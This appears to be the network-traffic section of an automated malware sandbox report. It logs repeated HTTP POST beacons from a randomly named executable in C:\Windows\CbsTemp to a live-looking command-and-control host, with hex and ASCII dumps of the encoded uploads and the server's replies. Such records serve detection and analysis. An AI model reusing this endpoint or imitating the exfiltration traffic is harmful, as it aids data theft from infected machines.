                                                                                                          Data Raw: 39 38 0d 0a 03 1d 27 0f 27 03 0e 12 22 38 32 0f 2b 14 3c 01 2b 20 21 01 39 07 30 12 31 1a 20 17 32 3c 23 04 37 06 2e 00 3c 3b 35 58 30 18 24 1d 3c 3b 20 5c 04 1f 24 5c 3c 5e 21 52 2a 3c 26 5f 24 20 25 5d 32 0a 20 58 26 03 3b 5a 24 39 3e 54 37 17 2b 54 3b 23 0c 1b 2d 38 3f 04 3c 37 06 59 26 3e 2f 50 0f 10 38 18 2c 3a 27 5d 20 21 3a 55 36 55 3c 00 37 25 30 1d 3f 3d 27 54 23 3f 32 03 27 55 26 08 23 22 33 1d 25 20 37 14 3c 32 2b 0a 28 19 24 55 2c 02 2c 49 02 3f 58 52 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 98''"82+<+ !901 2<#7.<;5X0$<; \$\<^!R*<&_$ %]2 X&;Z$9>T7+T;#-8?<7Y&>/P8,:'] !:U6U<7%0?='T#?2'U&#"3% 7<2+($U,,I?XR0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          37192.168.2.550020104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:27.262592077 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:13:27.613787889 CET2532OUTData Raw: 55 55 5e 50 5c 5a 56 59 5e 5f 57 54 56 5d 59 5c 57 57 58 52 50 54 56 59 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UU^P\ZVY^_WTV]Y\WWXRPTVY[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#(;+'3&Z*-"/'X)*=)X']&R+"Y(/8">;:#_&'P-+
                                                                                                          Jan 8, 2025 17:13:27.703839064 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:27.951298952 CET818INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:27 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cqAqDZUP4gHvo%2B5TK5hPGnOnV%2FSVIEChkIDn%2F1BEcZc37Ta0kIRcHHMNRh1i%2FvrMjmuAxNGMcp%2Bie2hUDn%2BUCOdTNwIllu1C%2Fj9lCmc%2FY6PpAu43BIcnsiUA1%2FQvjatmfmYGEa%2B7"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7997de26424b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1747&min_rtt=1606&rtt_var=884&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2857&delivery_rate=533820&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          38192.168.2.550021104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:28.097784042 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:13:28.441868067 CET2532OUTData Raw: 55 5c 5b 50 59 5a 53 59 5e 5f 57 54 56 59 59 5e 57 57 58 5c 50 5b 56 5a 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: U\[PYZSY^_WTVYY^WWX\P[VZ[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ [(^0$#**>5/44?.2(8>&+9("8(?(5-/X-?#_&'P-
                                                                                                          Jan 8, 2025 17:13:28.541745901 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:28.778265953 CET814INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:28 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yg5oaGXv5%2F%2BMbqGq71%2FEp%2BMaTc9eKgJSRb2aek%2FbK03kmNpK2cHUAuVMLoWXyWtFCsewYrOMrQWGXOW1ejRlEuctqA%2F2EwZRIqim6a%2BzLVeeXlrogY4miwWc6bViVe%2BcYaVg1lii"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed799d1f79424b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4516&min_rtt=1583&rtt_var=6459&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2857&delivery_rate=58290&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          39192.168.2.550022104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:28.902935982 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:29.254347086 CET2532OUTData Raw: 50 57 5b 53 59 58 53 5e 5e 5f 57 54 56 5f 59 5b 57 5f 58 5a 50 58 56 5e 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PW[SYXS^^_WTV_Y[W_XZPXV^[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ +;33=?-8B+Y>%^>]3("S<1'>\!-:#_&'P-#
                                                                                                          Jan 8, 2025 17:13:29.487891912 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:29.578504086 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:29.778183937 CET805INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:29 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FXwdnqqX0wCZjAp0sb4h8AnKWjumpcFMnXLUmSNHv4RNN8iqzL%2Be0kDaFFOFjhvgzM1YwfyAzQlIEtM%2B6HbTbuaUbQfCcvYrBrYKyoRgeBjAsEoaYtNPLdc2qH6KVvkvzDNzV2m0"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed79a23dde729f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=18045&min_rtt=13388&rtt_var=14336&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=28824&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          40192.168.2.550023104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:29.928805113 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2528
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:30.285630941 CET2528OUTData Raw: 55 50 5b 50 5c 5a 56 5c 5e 5f 57 54 56 5e 59 5c 57 54 58 5b 50 5d 56 5c 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UP[P\ZV\^_WTV^Y\WTX[P]V\[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ <?X'#))5[,)>(+5Y3;<1 *76=,/#_&'P-?
                                                                                                          Jan 8, 2025 17:13:30.376827002 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:30.613677025 CET805INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:30 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7k88OCRSUSEct%2FRK0iAUrguRAgLeW6BEg1mFJ52OTmqQ5fXUQefONWnqq45nAxwMHkAAPZh6w2zV6CLUHswWlMQAOpPKgU82sGDXv5Gy%2FJxRERCZ3HQ4G7dO%2BSagnBKXyykJOUfY"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed79a89dbd729f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2241&min_rtt=2022&rtt_var=1197&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2877&delivery_rate=386550&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          41192.168.2.550024104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:30.747875929 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:31.098148108 CET2532OUTData Raw: 50 56 5e 56 59 5d 56 52 5e 5f 57 54 56 56 59 52 57 57 58 52 50 5a 56 5a 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PV^VY]VR^_WTVVYRWWXRPZVZ[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ _(8 $"*=:8$>.*$]%(T3=/5=7_-?#_&'P-
                                                                                                          Jan 8, 2025 17:13:31.211527109 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:31.460086107 CET807INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:31 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ktRStU9lSMr9oH06Qu41CS6Y3ldvI6N4y1Gp42O40Lp1PvhwCmx9zQYBHkYGpY8oqQhhrQZNZ2fFAHL5PRbLZ%2B%2FtAXEsWWFdKiy8tkxszqh9cZmCoh6CeyCJvcB7kNssSqo%2BfZ%2B9"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed79adc962c34f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2993&min_rtt=1525&rtt_var=3508&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=110030&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          42192.168.2.550025104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:31.620716095 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:31.973416090 CET2532OUTData Raw: 55 5c 5e 57 59 5d 53 5c 5e 5f 57 54 56 56 59 58 57 52 58 53 50 5b 56 50 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: U\^WY]S\^_WTVVYXWRXSP[VP[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#((]$3>^>%Y,7?-=Z*86$!+T;X>!.'^9#_&'P-
                                                                                                          Jan 8, 2025 17:13:32.064043045 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:32.306776047 CET808INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:32 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=npHH8cmnLBBwcll7YiZX6qFh%2BoFqSRLui%2FLtxc4054R3DTjVD7Qn2w%2Bjsv0YHtTL9PzfVuc6PV0I5soC9O%2BBqJ9dyC1Bh%2BPJaWAAoV5py0k1iI8QHzEeXfBqkqcRr6cCDvz1Mt2b"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed79b3187143b3-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1742&min_rtt=1567&rtt_var=939&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=491251&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          43192.168.2.550026104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:32.401484966 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 1828
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:32.754415989 CET1828OUTData Raw: 55 5d 5e 52 59 5c 56 5b 5e 5f 57 54 56 5d 59 5b 57 56 58 5a 50 5b 56 5a 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: U]^RY\V[^_WTV]Y[WVXZP[VZ[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ X(;7\3>=X,$#*%_*+13(!?(*Y#!/,/#_&'P-+
                                                                                                          Jan 8, 2025 17:13:32.852674007 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:33.095513105 CET952INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:33 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bz7z47qTI4ColBcNp3mmNntHWOXjUVHkNm4c91ApgfeXoyAjNVEeAJEuk%2BjZAQrhGkXcg%2BhMvlS5dYy2V58rZ1b2NhwCmvPatnHDaTFcvDIQa5jjTeYrSQde11vuMjqiK1tHwgMy"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed79b808a443b3-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2792&min_rtt=1613&rtt_var=2964&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2177&delivery_rate=132138&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 39 38 0d 0a 03 1d 24 1f 27 3e 2c 5e 23 05 2d 13 28 04 09 58 29 55 39 02 2c 29 3f 03 32 24 20 5f 27 3c 20 58 37 01 03 13 28 38 26 00 27 50 38 54 2a 3b 20 5c 04 1f 24 14 3f 38 03 57 2a 59 2a 16 30 33 0b 13 32 0d 34 5c 26 3d 27 10 33 07 22 1e 34 29 3b 55 2f 33 07 0b 2e 38 24 13 28 27 2f 00 24 3e 2f 50 0f 10 38 51 2d 2a 30 05 36 57 32 57 20 30 28 01 23 25 2c 59 29 3d 2c 0a 21 2c 32 03 24 23 1c 0b 34 0b 3b 57 27 0a 33 5b 28 57 28 53 2b 09 24 55 2c 02 2c 49 02 3f 58 52 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 98$'>,^#-(X)U9,)?2$ _'< X7(8&'P8T*; \$?8W*Y*0324\&='3"4);U/3.8$('/$>/P8Q-*06W2W 0(#%,Y)=,!,2$#4;W'3[(W(S+$U,,I?XR0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          44192.168.2.550027104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:32.641855955 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:32.988795042 CET2532OUTData Raw: 50 57 5e 56 5c 5d 56 59 5e 5f 57 54 56 5a 59 52 57 57 58 5c 50 54 56 51 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PW^V\]VY^_WTVZYRWWX\PTVQ[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ ^<^7X00-=.![.44?-9=;10&?;=/"./#_&'P-7
                                                                                                          Jan 8, 2025 17:13:33.104511976 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:33.341219902 CET821INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:33 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gmZ9WY%2F4osNIjtZPMMN%2BsWOwuwx7H680THGKVIhlLCx7gA1BRkt2bvbw12bLk4KbG%2Bek%2FrD9KKtnQhiic0hib%2BiyoxYgWtz4e8x%2BJdOKA6o9yBHF5h%2BfA%2FYAG3agu%2FjU4yYAX%2B%2Fe"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed79b99a560f5b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3055&min_rtt=1635&rtt_var=3454&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=112299&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          45192.168.2.550028104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:33.465569019 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:13:33.816852093 CET2532OUTData Raw: 50 52 5b 57 59 5e 53 5e 5e 5f 57 54 56 57 59 53 57 56 58 5f 50 59 56 5e 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PR[WY^S^^_WTVWYSWVX_PYV^[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#*++\%3-*>",4\=>[*6$<!/Y(?X6[$.#_&'P-
